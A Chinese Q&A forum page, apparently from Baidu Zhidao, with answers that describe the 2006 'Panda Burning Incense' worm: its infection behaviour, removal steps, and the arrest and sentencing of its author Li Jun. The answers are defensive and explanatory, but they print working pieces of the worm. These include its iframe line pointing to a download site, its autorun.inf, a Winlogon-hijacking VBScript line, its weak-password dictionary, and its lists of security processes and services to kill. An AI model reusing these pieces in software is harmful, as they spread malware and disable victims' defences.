熊猫烧香代码怎制成病毒?熊猫烧香病毒是一个什么样的病毒?

这个病毒我中过，该病毒的作者叫李俊，这个病毒是一个蠕虫病毒，当时国内外所有的杀毒软件都对它无效，病毒每隔几秒钟就会自动关闭任务管理器以及各种杀毒软件，最后全盘格式化才解决问题，不过现在已经能干掉它了 专杀工具也有。这个病毒作用是
1、病毒删除扩展名为gho的文件，使用户无法使用ghost软件恢复操作系统。
2、中毒时会弹出的窗口
3、“熊猫烧香”感染系统的.exe .com. f.src .html.asp文件，添加病毒网址，导致用户一打开这些网页文件，IE就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和setup.exe，可以通过U盘和移动硬盘等方式进行传播，并且利用Windows系统的自动播放功能来运行，搜索硬盘中的.exe可执行文件并感染，感染后的文件图标变成“熊猫烧香”图案。“熊猫烧香”还可以通过共享文件夹、用户简单密码等多种方式进行传播。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。
如果想详细的了解可以去百度百科http://baike.baidu.com/view/697258.htm?fr=aladdin

http://tool.duba.net/zhuansha/253.shtml熊猫烧香”，又称“武汉男生”，这是一个感染型

的蠕虫病毒，它能感染系统中exe，com，pif，src，html

，asp等文件，它还能中止大量的反病毒软件进程并且会

删除扩展名为gho的文件，该文件是一系统备份工具GHOST

的备份文件，使用户的系统备份文件丢失。

病毒行为:
这是一个感染型的蠕虫病毒,它能感染系统中

exe,com,pif,src,html,asp等文件,
它还能中止大量的反病毒软件进程

1:拷贝文件
病毒运行后,会把自己拷贝到
C:\WINDOWS\System32\Drivers\spoclsv.exe

2:添加注册表自启动
病毒会添加自启动项
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Run
svcshare -> C:\WINDOWS\System32

\Drivers\spoclsv.exe

3:病毒行为
a:每隔1秒
寻找桌面窗口,并关闭窗口标题中含有以下字符的程序
QQKav
QQAV
防火墙
进程
VirusScan
网镖
杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马克星
木马清道夫
QQ病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
esteem proces
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
msctls_statusbar32
pjf(ustc)
IceSword
并使用的键盘映射的方法关闭安全软件IceSword

添加注册表使自己自启动
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Run
svcshare -> C:\WINDOWS\System32

\Drivers\spoclsv.exe

并中止系统中以下的进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
kvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe

b:每隔18秒
点击病毒作者指定的网页,并用命令行检查系统中是否存

在共享
共存在的话就运行net share命令关闭admin$共享

c:每隔10秒
下载病毒作者指定的文件,并用命令行检查系统中是否存

在共享
共存在的话就运行net share命令关闭admin$共享

d:每隔6秒
删除安全软件在注册表中的键值

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr

entVersion\Run
RavTask
KvMonXP
kav
KAVPersonal50
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStartEXE
YLive.exe
yassistse

并修改以下值不显示隐藏文件
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr

entVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue -> 0x00

删除以下服务:
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc

e:感染文件
病毒会感染扩展名为exe,pif,com,src的文件,把自己附加

到文件的头部
并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加

一网址,
用户一但打开了该文件,IE就会不断的在后台点击写入的

网址,达到
增加点击量的目的,但病毒不会感染以下文件夹名中的文

件:
WINDOW
Winnt
System Volume Information
Recycled
Windows NT
WindowsUpdate
Windows Media Player
Outlook Express
Internet Explorer
NetMeeting
Common Files
ComPlus Applications
Messenger
InstallShield Installation Information
MSN
Microsoft Frontpage
Movie Maker
MSN Gamin Zone

g:删除文件
病毒会删除扩展名为gho的文件,该文件是一系统备份工具

GHOST的备份文件
使用户的系统备份文件丢失.
10.怎样预防熊猫烧香
最近那个熊猫烧香病毒让所有用电脑的人很生气，熊

猫这个国宝似乎不再可爱，而成了人人喊打的过街老鼠。

熊猫变种实在太多，中招后的损失很严重，杀毒软件一直

在救火中。以下几招很简单易行，帮你预防熊猫烧香病毒

，至少能明显减少你中招的几率。

1．立即检查本机administrator组成员口令，一定放

弃简单口令甚至空口令，安全的口令是字母数字特殊字符

的组合，自己记得住，别让病毒猜到就行。修改方法，右

键单击我的电脑，选择管理，浏览到本地用户和组，在右

边的窗格中，选择具备管理员权限的用户名，单击右键，

选择设置密码，输入新密码就行。

2．利用组策略，关闭所有驱动器的自动播放功能。

步骤：单击开始，运行，输入gpedit.msc，打开组策

略编辑器，浏览到计算机配置，管理模板，系统，在右边

的窗格中选择关闭自动播放，该配置缺省是未配置，在下

拉框中选择所有驱动器，再选取已启用，确定后关闭。最

后，在开始，运行中输入gpupdate，确定后，该策略就生

效了。

3．修改文件夹选项，以查看不明文件的真实属性，

避免无意双击骗子程序中毒。

步骤：打开资源管理器（按windows徽标键＋E），点

工具菜单下文件夹选项，再点查看，在高级设置中，选择

查看所有文件，取消隐藏受保护的操作系统文件，取消隐

藏文件扩展名。

4．时刻保持操作系统获得最新的安全更新，建议用

毒霸的漏洞扫描功能，汗，很可惜，现在光缆还没修好，

网不通，不好修复。

5．启用windows防火墙保护本地计算机。
2)Logo1_.exe
Logo1_ – Logo1_.exe – 进程信息
进程文件：Logo1_ 或者 Logo1_.exe
进程名称： Worm.Win32.Viking.j

描述：
Logo1_.exe是Worm.Win32.Viking.j木马相关程序，病毒

中文名叫维金。建议立即删除。
相关文件是rundl132.exe，会感染exe文件，杀掉后即使

重装系统点击感染文件也会重生，经常藏在c盘windows目

录下。
被感染的exe文件特征：被更改图标，病毒文件本身也会

改为被感染文件图标。

属于： Worm.Win32.Viking.j

系统进程： 否
后台程序： 否
使用网络： 否
硬件相关： 否
常见错误： 未知N/A
内存使用： 未知N/A

安全等级 (0-5): 2
间谍软件： 否
广告软件： 否
病毒： 是
木马： 是

主要症状:
1、占用大量网速，使机器使用变得极慢。
2、会捆绑所有的exe文件，只要一运用应用程序，在

winnt下的logo1.exe图标就会相应变成应用程序图标。
3、有时还会时而不时地弹出一些程序框，有时候应用程

序一起动就出错，有时候起动了就被强行退出。
4、网吧中只感梁win2k pro版，server版及xp系统都不感

染。
5、能绕过所有的还原软件。
详细技术信息：
病毒运行后，在%windir%生成 logo1_.exe 同时会在

windws根目录生成一个名为virdll.dll的文件。
%windir%virdll.dll
该蠕虫会在系统注册表中生成如下键值：
[hkey_local_machinesoftwaresoftdownloadwww]
auto = 1

盗取密码
病毒试图登陆并盗取被感染计算机中网络游戏传奇2

的密码，将游戏密码发送到该木马病毒的植入者手中。

阻止以下杀毒软件的运行
病毒试图终止包含下列进程的运行，这些多为杀毒软

件的进程。 包括卡八斯基，金山公司的毒霸。瑞星等。

98%的杀毒软件运行。国产软件在中毒后都被病毒杀死，

是病毒杀掉-杀毒软件。如金山，瑞星等。哪些软件可以

认出病毒。但是认出后不久就阵亡了。通过写入文本信息

改变%system%driversetchosts 文件。这就意味着，当受

感染的计算机浏览许多站点时（包括众多反病毒站点），

浏览器就会重定向到66.197.186.149。

病毒感染运行windows操作系统的计算机，并且通过

开放的网络资源传播。一旦安装，蠕虫将会感染受感染计

算机中的.exe文件。该蠕虫是一个大小为82k的windows

pe可执行文件。通过本地网络传播该蠕虫会将自己复制到

下面网络资源：
admin$
ipc$

症状
蠕虫会感染所有.exe的文件。但是，它不会感染路径中包

含下列字符串的文件：
program files
common files
complus applicati
documents and settings
netmeeting
outlook express
recycled
system
system volume information
system32
windows
windows media player
windows nt
windowsupdate
winnt

蠕虫会从内存中删除下面列出的进程：
eghost.exe
iparmor.exe
kavpfw.exe
kwatchui.exe
mailmon.exe
ravmon.exe
z
网吧遭此病毒破坏造成大面积的卡机，瘫痪。危害程

度可以和世界排名前十的爱情后门变种相比。该病毒可以

通过网络传播，传播周期为3分钟。如果是新做的系统处

于中了毒的网络环境内，只要那个机器一上网，3分钟内

必定中招。中招后你安装 rising skynet symantec

mcafee gate rfw.exe ravmon.exe kill nav 等杀
毒软件 都无法补救你的系统，病毒文件 logo1_.exe 为

主体病毒，他自动生成病毒发作所需要的的 sws32.dll
sws.dlll kill.exe 等文件。这些文件一但衍生。他将迅

速感染系统内explore 等系统核心进程 及所以.exe
的可执行文件，外观典型表现症状为 传奇 ，泡泡堂，等

游戏图标变色。 此时系统资源可用率极低，你每重新启

动一次，病毒就会发作一次。
该病毒对于防范意识较弱，还原软件未能及时装到位

的网吧十分致命，其网络传播速度十分快捷有效。旧版的

杀毒软件无法检测，新版的无法彻底根杀。一但网吧内某

台机器中了此病毒，那么该网吧所有未中毒的机器都处于

危险状态。由于病毒发作贮留于内存。且通过

explore.exe 进行传播。因此即使是装了还原精灵，还原

卡的机器也同样会被感染。你重新启动后系统可以还原。

但是你一但开机还是会被感染。病毒发作会生成另外病毒

pwsteal.lemir.gen 和 trojan.psw.lineage 等等。都是

些非常厉害的后门程序。和外挂病毒相似，但是其威力是

外挂病毒的50倍以上。在win98平台下，改病毒威害比较

小。在win2000 /xp/2003平台对于网吧系统是致命的。运

行系统极度卡机。你重新启动后你会发现你所有游戏

的.exe 程序全部都感染了最新杀毒软件杀完后。除了系

统可以勉强运行。其他的你也别想运行了。

病毒清理办法
如果在病毒没有发作情况下杀毒是可以完全搞定的。

如果发作了也不要杀毒了。直接克盘恢复吧。
一、找到注册表中

[hkey_local_machinesoftwaresoftdownloadwww]
auto = 1
删除downloadwww主键
二、找到
[hkey_local_machinesoftwaremicrosoftwindows

ntcurrentversioninifilemappingsystem.iniboot]
winlogo 项
把winlogo 项 后面的c:winntsws32.dll 删掉
接下来把hkey_local_machine]

software/microsoft/windows/currentversi 键中

/runonce/runonceex
两个中其中有个是也是
c:winntsws32.dll
把类似以上的全部删掉 注意不要删除默认的键值（删了

的话后果自负）
如果没有以上键值，则直接跳过此步骤

三 结束进程
按“ctrl+alt+del”键弹出任务管理器，找到logo1_.exe

等进程，结束进程，可以借助绿鹰的进程管理软件处
理更方便。找到expl0rer.exe进程（注意第5个字母是数

字0不是字母o），找到它后选中它并点击“结束进程”
以结束掉（如果expl0rer.exe进程再次运行起来需要重做

这一步）。
四 装杀毒软件
装完后不要重新启动（切记）直接升级病毒库，升级完后

，把c:winnt 目录下所有带毒文件删除。然后运行
杀毒软件开始杀毒。
杀完后。还有几个杀毒软件无法删掉的东西要把名字记下

来。因为不同的系统有不同的名字。所以这里说不清
楚了。自己记下来。,重新启动后再次杀毒。记的把可疑

的进程的结束。否则杀毒软件无法干净杀毒。还有最重
要的一点记的把杀毒软件无法清除的病毒设置为删除文件

。一般要重复杀毒3-5次才能杀干净。
五。看看杀毒后的系统。
缺少的了很多系统文件。系统处于危险状态。如果你

有ghost 备份。这个时候恢复一下。系统可以干净无损。

如果没有请运行 sfc 命令检查文件系统。具体操作为 运

行-输入cmd 命令进入dos 提示符。-输入sfc
/scannow — 提示放入系统光盘。–放进去吧。然后慢慢

等。看看成果。杀毒效果显著。毒杀干净了。但是杀完毒

后很多游戏都玩不了。忙了一圈都不知道自己在忙什么。

郁闷吧。然后重新做系统吧。谁叫中毒的是网吧的系统杀

毒及重装系统后的防范，有些网友在处理病毒的时候可能

有这样的感觉好不容易清除了，或者没办法重新装了系统

，但是没多长时间有中了同样的病毒，所以说有免疫程序

实最好的了。
回答者：xiayu_xavier – 秀才 三级 4-2 12:59

熊猫烧香!!!!!!!!救命!!!!!
回答者：diaomai123 – 试用期 一级 4-2 16:14

今年1月中旬，湖北省仙桃市公安局网监部门根据公安部公共信息网络
安全监察局及省公安厅的统一部署，对“熊猫烧香”病毒的制作者开展
调查。经查，熊猫烧香病毒的制作者为湖北省武汉市李俊，据李俊交代，
其于2006年10月16日编写了“熊猫烧香”病毒并在网上广泛传播，并且
还以自己出售和由他人代卖的方式，在网络上将该病毒销售给120余人，
非法获利10万余元。经病毒购买者进一步传播，导致该病毒的各种变种
在网上大面积传播，对互联网用户计算机安全造成了严重破坏。李俊还
于2003年编写了“武汉男生”病毒、2005年编写了“武汉男生2005”病
毒及“QQ尾巴”病毒。另外，本案另有几个重要犯罪嫌疑人雷磊（男，
25岁，武汉新洲区人）、王磊（男，22岁，山东威海人）、叶培新（男，
21岁，浙江温州人）、张顺（男，23岁，浙江丽水人）通过改写、传播
“熊猫烧香”等病毒，构建“僵尸网络”，通过盗窃各种游戏和QQ账号
等方式非法牟利。

目前，李俊、雷磊等5名犯罪嫌疑人已被刑事拘留。

由犯罪嫌疑人李俊编写的“熊猫烧香”病毒专杀工具请登陆

www.xt110.net下载
昨日，仙桃警方媒体通报：将择日在www.xt110.net网站公开“熊猫烧香”杀毒软件，供网民下载。

昨日下午1时30分，记者在仙桃某看守所见到了李俊。据其交待，制作“熊猫烧香”病毒仅用2个月，当初是为“好玩”，现在后悔不已。警方将李俊抓获后，李在看守所里写下杀毒软件程序，交给了警方。经试验，该程序能在几分钟内彻底杀灭“熊猫烧香”病毒。

http://down1.tech.sina.com.cn/download/down_contents/1173542400/35101.shtml下载

注：部分安全工具可能提示有病毒，此为误报，可将安全工具暂时关闭，再运行此专杀程序。
回答者：mydream2080 – 试用期 一级 4-5 14:47

1.熊猫烧香病毒：图片就是个熊猫在烧香感觉蛮可爱的！当时并没有很在意！第二天再次打开电脑的时候！几乎电脑所有的EXE文件都成了熊猫烧香图片！这时才有所感觉！

部分EXE文件已经无法正常使用！新加一个AUTORUN.INF的文件！

当初不明白这个文件的作用！在网上查了一些资料表明。才知道。只要用户打开盘符。就会运行这个病毒！用杀毒软件杀毒！没有效果！看来现在的杀毒软件越来越不行了~..

2.想用组合键打开任务管理器！无法打开~失败….想看看注册表有没什么情况。依然失败！奇怪的是：电脑运行正常。也都不卡！难道不是病毒.是系统出了问题？从网上下了第三方工具查看进程！果然看到两个可疑进程！FuckJacks.exe貌似是最可疑的不敢贸然终止！赶快问问白度大叔！

3.大叔告诉我。是熊猫病毒的进程！一切正如我意！懒的装系统了！

4.先结束FuckJacks.exe进程！开始-运行-CMD 输入：ntsd -c q -p 病毒的PID~终于KILL掉了！一切恢复正常了！兴奋ING…赶快打开注册表

突然注册表又关了.看看进程FuckJacks.exe。又出现了~~那应该它还有个守护进程！找找找。无发现….奇怪了。难道他的守护进程插入到系统

进程了？不会吧…..头疼一阵…。

5.算了，去向朋友找个专杀工具。有一个朋友说他写过熊猫的专杀工具！晕~~原来牛人在我身边。我都没发现~赶快想他请教~~才大概的了解了熊猫烧香~ 叫他给了我一个无壳的熊猫自己分析下~（自己动手.丰衣足食嘛~~）

6.用UI32打开熊猫.看到了条用的部分资源！文件执行后。释放到\system32\FuckJacks.exe下。

7.继续象下可以看到熊猫的一些传播过程相当的经典..有扫描同一网段的电脑~自我复制.等等相当强大公能~同时感染所有盘符的EXE文件~却不对一些重要的系统文件和常用文件进行感染！可见并不想早成太大破坏~修改注册表.禁止打开注册表.甚至禁用了部分服务~~

8下面就是重要的时刻了！从后面的代码可以看出！病毒的作者是个非常出色的程序员！有非常好的编程习惯！对病毒的异常运行~进行了很好的定义~都很大段都是作者对病毒运行条件的判断定义~值得注意的一点：在感染EXE文件的同时！感染ASP。HTML文件。会在最后加一段类似挂马的基本代码.~~做到通过第三方尽快传播的办法~（如果被感染者是网站管理人员。后果可想而知了）
病毒程序的运行
在给大家说下病毒的部分运行实现！简单的修改注册表：

有这样一句：WSHELL.REGWIRTE MYREGKEY， MYREGVALUE， MY REGTYPE
第一个是参数的键名：完整路径..

第二个是：键值。。

第三个是：键的类型，

Set wshell=wscript.createobject(“wscript.shell”)

wshell.regWrite”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows NT\CurrentVersion\Winlogin\shell”,”eseplorer.exe”,”REG_SZ”

这就是脚本病毒掼用技术~

通用的解决方法

1、就是要关闭自己的默认共享。

首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把

RestrictAnonymous = DWORD的键值改为：00000001。

restrictanonymous REG_DWORD

0x0 缺省

0x1 匿名用户无法列举本机用户列表

0x2 匿名用户无法连接本机IPC

说明:不建议使用2，否则可能会造成你的一些服务无法启动，如SQL Server

2、禁止默认共享

1）察看本地共享资源

运行-cmd-输入net share

2）删除共享(每次输入一个）

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete（如果有e,f,……可以继续删除）

3）修改注册表删除共享

运行-regedit

找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]

把AutoShareServer（DWORD）的键值改为0000000。

如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。??

我们看看这个病毒功能： 瞬间复制整个硬盘、有监视QQ记录的功能、网吧的电脑依然有效！显然有了精灵的转存功能。值得注意的功能：删除GHOST的功能，控制电脑进行集体的DDOS，更出现了KILL掉KV、瑞星和金山的功能！

病毒的特性：网页传播！电脑的弱口令。默认共享传播！在内网的传播速度非常的快！对企业的居于网有很大的杀伤力！病毒瞬间复制整个硬盘。占用内存极小~

熊猫这款病毒虽然不是很新鲜。但是病毒的作者真的很让人佩服~完全的网络高手！超强的优秀程序员！

熊猫烧香病毒详细行为：
1.复制自身到系统目录下：

%System%\drivers\spoclsv.exe（“%System%”代表Windows所在目录，比如：C:\Windows）

不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。

2.创建启动项：

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“svcshare”=”%System%\drivers\spoclsv.exe”

3.在各分区根目录生成病毒副本：
X:\setup.exe
X:\autorun.inf

autorun.inf内容：

[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

4.使用net share命令关闭管理共享：

cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y

5.修改“显示所有文件和文件夹”设置：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Explorer\Advanced\Folder\Hidden\SHOWALL]
“CheckedValue”=dword:00000000

6.熊猫烧香病毒尝试关闭安全软件相关窗口：

天网
防火墙
进程
VirusScan
NOD32
网镖
杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马清道夫
木马清道夫
QQ病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
Windows 任务管理器
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
超级巡警
msctls_statusbar32
pjf(ustc)
IceSword

7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程：

Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe

8.禁用安全软件相关服务：

Schedule
sharedaccess
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc

9.删除安全软件相关启动项：

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：

<iframe src=”hxxp://www.ctv163.com/wuhan/down.htm” width=”0″ height=”0″ frameborder=”0″> </iframe>

但不修改以下目录中的网页文件：

C:\WINDOWS
C:\WINNT
C:\system32
C:\Documents and Settings
C:\System Volume Information
C:\Recycled
Program Files\Windows NT
Program Files\WindowsUpdate
Program Files\Windows Media Player
Program Files\Outlook Express
Program Files\Internet Explorer
Program Files\NetMeeting
Program Files\Common Files
Program Files\ComPlus Applications
Program Files\Messenger
Program Files\InstallShield Installation Information
Program Files\MSN
Program Files\Microsoft Frontpage
Program Files\Movie Maker
Program Files\MSN Gamin Zone

11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。

12.此外，病毒还会尝试删除GHO文件。

病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中：
password
harley
golf
pussy
mustang
shadow
fish
qwerty
baseball
letmein
ccc
admin
abc
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
super
123asd
ihavenopass
godblessyou
enable
alpha
1234qwer
123abc
aaa
patrick
pat
administrator
root
sex
god
****you
****
test
test123
temp
temp123
win
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
love
mypc
mypc123
admin123
mypass
mypass123
Administrator
Guest
admin
Root

解决方案：
1. 结束病毒进程：

%System%\drivers\spoclsv.exe

不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。但可用此方法清除。

“%System%\system32\spoclsv.exe”是系统文件。（目前看来没有出现插入该系统进程的变种，不排除变种的手法变化。）

查看当前运行spoclsv.exe的路径，可使用超级兔子魔法设置。

2. 删除病毒文件：

%System%\drivers\spoclsv.exe

请注意区分病毒和系统文件。详见步骤1。

3. 删除病毒启动项：

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“svcshare”=”%System%\drivers\spoclsv.exe”

4. 通过分区盘符右键菜单中的“打开”进入分区根目录，删除根目录下的病毒文件：

X:\setup.exe
X:\autorun.inf

5. 恢复被修改的“显示所有文件和文件夹”设置：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Explorer\Advanced\Folder\Hidden\SHOWALL]
“CheckedValue”=dword:00000001

6. 修复或重新安装被破坏的安全软件。

7.修复被感染的程序。可用专杀工具进行修复，收集了四个供读者使用。金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具。

手动恢复中毒文件

1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件，即执行之前的步骤1、2、4、5。

2.打开“运行”输入“gpedit.msc”打开组策略－本地计算机策略－windows设置－安全设置－软件限制策略－其它规则。在其它规则上右键选择－新散列规则－打开新散列规则窗口

3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择－不允许的。确定后重启。

4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项（不会有问题的）。

5.双击运行被感染的程序已经恢复原来样子了。全部回复后，用SREng把FuckJacks.exe在注册表里的启动项删除即可！

我就直接抄维基了

熊猫烧香是一种经过多次变种的蠕虫病毒变种，2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写，2007年1月初肆虐网络，它主要透过下载的文件传染。

2007年2月12日，湖北省公安厅宣布，李俊以及其同伙共8人已经落网，这是中国警方破获的首例计算机病毒大案。

目录

1 病毒特征
2 病毒案件的侦破与病毒作者
3 参考文献
4 参阅
5 外部链接

病毒特征

“熊猫烧香”以游戏的外貌来吸引人安装。

使用Windows系统的用户中毒后，后缀名为.exe的文件无法执行，并且文件的图标会变成熊猫举着三根烧着的香的图案。[1]，但不具有Win32.Parite的特征，不会感染操作系统的可执行文件。[2] 而扩展名为.gho的赛门铁克公司软件Norton Ghost的系统磁盘备份文件也会被病毒自动检测并删除；大多数知名的网络安全公司的杀毒软件以及防火墙会被病毒强制结束进程，甚至会出现蓝屏、频繁重启的情况，病毒还利用Windows2000/XP系统共享漏洞以及用户的弱口令如系统管理员密码为空，不少安全防范意识低的网吧以及局域网环境全部计算机遭到此病毒的感染。同时病毒执行后在各盘释放autorun.inf以及病毒体自身，造成中毒者硬盘磁盘分区以及U盘、移动硬盘等可移动磁盘均无法正常打开。[3]

由于此病毒具有在htm、html、asp、php、jsp、aspx等格式的网页文件中使用HTML的iframe标记元素嵌入病毒网页代码的能力，所以网页设计制作工作者的机器一旦中毒，那么使用过低版本或未更新安全补丁的Windows系列操作系统的网友访问他们设计的网站均会中此病毒。[4]

未必所有杀毒软件都可以辨识及阻挡“熊猫烧香”

李俊创建了病毒更新服务器，在更新最勤时一天要对病毒更新升级8次[5]，与俄罗斯杀毒软件卡巴斯基反病毒库每3小时更新一次的更新速度持平，所以凭借更新的速度杀毒软件很难识别此计算机病毒的多种变种。

病毒案件的侦破与病毒作者

有人通过对此毒脱壳后的特征码分析发现有“whboy”的标识[6]，而此标识也曾出现在2004年的一只病毒“武汉男生”上，所以该病毒也被称为“武汉男生”，通过查看李俊的早期作品可以看到他的QQ号码以及他创建的网站信息，有了这些信息，侦破案件的湖北公共信息网络安全监察的工作就容易了许多。

由骇客李俊2004年出品的“武汉男生2005”软件后台生成器截图，这是“熊猫烧香”病毒的雏形

该病毒作者是李俊，武汉新洲区人，25岁[7]。据他的家人以及朋友介绍，他在初中时英语和数学成绩都很不错，但还是没能考上高中，中专在娲石职业技术学校就读，学习的是水泥工艺专业，毕业后曾上过网络技术职业培训班，他朋友讲他是“自学成才，他的大部分电脑技术都是看书自学的”[8]。2004年李俊到北京、广州的网络安全公司求职，但都因学历低的原因遭拒，于是他开始抱着报复社会以及赚钱的目的编写病毒了。他曾在2003年编写了病毒“武汉男生”，2005年他还编写了病毒QQ尾巴，并对“武汉男生”版本更新成为“武汉男生2005”。

此次传播的“熊猫烧香”病毒，作者李俊是先将此病毒在网络中卖给了120余人，每套产品要价500～1000元人民币，每日可以收入8000元左右，最多时一天能赚1万余元人民币，作者李俊因此直接非法获利10万余元。然后由这120余人对此病毒进行改写处理并传播出去的，这120余人的传播造成100多万台计算机感染此病毒，他们将盗取来的网友网络游戏以及QQ帐号进行出售牟利，并使用被病毒感染沦陷的机器组成“僵尸网络”为一些网站带来流量。[9]

被逮捕的几位重要犯罪嫌疑人资料：

姓名

性别

到案年龄

住所

李俊
男
25岁
武汉新洲区人

雷磊
男
25岁
武汉新洲区人

王磊
男
22岁
山东威海人

叶培新
男
21岁
浙江温州人

张顺
男
23岁
浙江丽水人

王哲
男
24岁
湖北仙桃人

2007年9月24日，湖北省仙桃市人民法院一审以破坏计算机信息系统罪判处李俊有期徒刑四年、王磊有期徒刑二年六个月、张顺有期徒刑二年、雷磊有期徒刑一年，并判决李俊、王磊、张顺的违法所得予以追缴。[10]

目前熊猫烧香作者李俊已出狱，开始经营一家企业网络安全软件公司。[11]

2013年06月13日晚，据“丽水发布”官方微博消息，“熊猫烧香”病毒制造者张顺、李俊在浙江丽水设立网络赌场，敛财数百万元，已被当地检察机关批捕。该事件发生在2013年初，涉案者共17人。[12]